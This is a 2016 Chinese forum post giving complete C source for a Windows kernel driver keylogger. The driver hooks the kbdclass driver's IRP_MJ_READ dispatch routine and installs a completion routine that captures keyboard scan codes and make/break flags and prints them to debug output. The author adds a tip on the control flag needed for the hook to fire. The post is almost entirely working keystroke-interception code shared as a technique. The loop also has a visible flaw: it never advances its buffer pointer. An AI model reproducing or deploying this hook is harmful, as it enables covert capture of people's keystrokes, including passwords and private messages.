
通过 IRP hook 实现键盘记录


只看楼主 倒序阅读 使用道具 楼主  发表于: 2016-02-04



测试机器:win7x86
myhead.h:


  1. #include <ntddk.h>  
  2.   
  3.   
  4. NTKERNELAPI NTSTATUS ObReferenceObjectByName  
  5. (  
  6. IN PUNICODE_STRING ObjectName,  
  7. IN ULONG Attributes,  
  8. IN PACCESS_STATE PassedAccessState OPTIONAL,  
  9. IN ACCESS_MASK DesiredAccess OPTIONAL,  
  10. IN POBJECT_TYPE ObjectType,  
  11. IN KPROCESSOR_MODE AccessMode,  
  12. IN OUT PVOID ParseContext OPTIONAL,  
  13. OUT PVOID *Object  
  14. );  
  15.   
  16.   
  17. typedef NTSTATUS(__stdcall *PDRVDISPATCHFUNC)(PDEVICE_OBJECT pDevObj, PIRP pIrp);  
  18.   
  19.   
  20.   
  21. NTSTATUS DisPatchRead(PDEVICE_OBJECT pDevObj, PIRP pIrp);  
  22. NTSTATUS Hook(BOOLEAN IsEnble);  
  23. void Unload(PDRIVER_OBJECT pDriverObj);  
  24. NTSTATUS  
  25. MyCompletionRoutine(  
  26. __in PDEVICE_OBJECT  DeviceObject,  
  27. __in PIRP  Irp,  
  28. __in PVOID  Context  
  29. );  



test.c


  1. #include "myhead.h"  
  2. #include <ntddkbd.h>  
  3.   
  4. extern POBJECT_TYPE *IoDriverObjectType;  
  5. PDRVDISPATCHFUNC OrlDispatchRead = NULL;  
  6. ULONG numPendingIrps = 0;  
  7.   
  8. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegisterStr)  
  9. {  
  10.     UNREFERENCED_PARAMETER(pRegisterStr);  
  11.     NTSTATUS status = STATUS_SUCCESS;  
  12.     pDriverObj->DriverUnload = Unload;  
  13.   
  14.     DbgPrint("DriverEntry\n");  
  15.     Hook(TRUE);  
  16.     return status;  
  17. }  
  18.   
  19. void Unload(PDRIVER_OBJECT pDriverObj)  
  20. {  
  21.     LARGE_INTEGER liDelayTime;  
  22.     Hook(FALSE);  
  23.     liDelayTime.QuadPart = -1000000;  
  24.     while (numPendingIrps > 0)  
  25.     {  
  26.         KeDelayExecutionThread(KernelMode, FALSE, &liDelayTime);  
  27.     }  
  28.     DbgPrint("Unload\n");  
  29. }  
  30.   
  31. NTSTATUS Hook(BOOLEAN IsEnble)  
  32. {  
  33.     NTSTATUS status = STATUS_UNSUCCESSFUL;  
  34.     UNICODE_STRING usKeyDrvName;  
  35.     PDRIVER_OBJECT pKeyDrvObj = NULL;  
  36.     RtlInitUnicodeString(&usKeyDrvName, L"\\Driver\\kbdclass");  
  37.     status = ObReferenceObjectByName(&usKeyDrvName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID*)&pKeyDrvObj);  
  38.     if (!NT_SUCCESS(status))  
  39.     {  
  40.         DbgPrint("ObReferenceObjectByName error status:%p\n",status);  
  41.         return status;  
  42.     }  
  43.     ObReferenceObject(pKeyDrvObj);  
  44.     if (IsEnble)  
  45.     {  
  46.         OrlDispatchRead = pKeyDrvObj->MajorFunction[IRP_MJ_READ];  
  47.         pKeyDrvObj->MajorFunction[IRP_MJ_READ] = (PDRVDISPATCHFUNC)DisPatchRead;  
  48.     }  
  49.     else  
  50.     {  
  51.         pKeyDrvObj->MajorFunction[IRP_MJ_READ] = OrlDispatchRead;  
  52.     }  
  53.   
  54.     return status;  
  55.   
  56. }  
  57.   
  58. NTSTATUS DisPatchRead(PDEVICE_OBJECT pDevObj, PIRP pIrp)  
  59. {  
  60.   
  61.     PIO_STACK_LOCATION pIrpSp = IoGetCurrentIrpStackLocation(pIrp);  
  62.     DbgPrint("pIrpSp->Control:%x", pIrpSp->Control);  
  63.     DbgPrint("abc:%x", SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL);  
  64.     pIrpSp->Control = SL_INVOKE_ON_SUCCESS /*| SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL*/;  
  65.     if (NT_SUCCESS(pIrp->IoStatus.Status))  
  66.     {  
  67.         DbgPrint("DisPatchRead KEY BOARD\n");  
  68.   
  69.         DbgPrint("CompletionRoutine %p BOARD\n", (PVOID)pIrpSp->CompletionRoutine);  
  70.         pIrpSp->Context = (PVOID)pIrpSp->CompletionRoutine;  
  71.         pIrpSp->CompletionRoutine = MyCompletionRoutine;  
  72.     }  
  73.     if (pIrp->PendingReturned)  
  74.     {  
  75.         IoMarkIrpPending(pIrp);  
  76.     }  
  77.     numPendingIrps++;  
  78.     return OrlDispatchRead(pDevObj, pIrp);  
  79. }  
  80.   
  81. NTSTATUS  
  82. MyCompletionRoutine(  
  83. __in PDEVICE_OBJECT  DeviceObject,  
  84. __in PIRP  Irp,  
  85. __in PVOID  Context  
  86. )  
  87. {  
  88.     DbgPrint("MyCompletionRoutine\n");  
  89.     PKEYBOARD_INPUT_DATA pKid;  
  90.     //PIO_STACK_LOCATION pIrpSp = IoGetCurrentIrpStackLocation(Irp);  
  91.     if (NT_SUCCESS(Irp->IoStatus.Status))  
  92.     {  
  93.         pKid = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;  
  94.         ULONG uCount = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);  
  95.         for (ULONG i = 0; i < uCount;i++)  
  96.         {  
  97.             switch (pKid->Flags)  
  98.             {  
  99.             case KEY_MAKE:  
  100.                 DbgPrint("\nFlag: KEY_MAKE\n");  
  101.                 break;  
  102.             case KEY_BREAK:  
  103.                 DbgPrint("\nFlag: KEY_BREAK\n");  
  104.                 break;  
  105.             }  
  106.             DbgPrint("Key Code: %x\n", pKid->MakeCode);  
  107.         }  
  108.     }  
  109.     if (Irp->PendingReturned)  
  110.     {  
  111.         IoMarkIrpPending(Irp);  
  112.     }  
  113.     numPendingIrps--;  
  114.     if ((Irp->StackCount > (ULONG)1) && (Context != NULL))  
  115.     {  
  116.         return ((PIO_COMPLETION_ROUTINE)Context)(DeviceObject, Irp, NULL);  
  117.     }  
  118.     else  
  119.         return Irp->IoStatus.Status;  
  120. }  


其中

  1. pIrpSp->Control = SL_INVOKE_ON_SUCCESS /*| SL_INVOKE_ON_ERROR | SL_INVOKE_ON_CANCEL*/;  


  1. 这一句是必须要设置的,不然进不了自己的完成函数!  

只看该作者 沙发  发表于: 2016-04-30
用户被禁言,该主题自动屏蔽!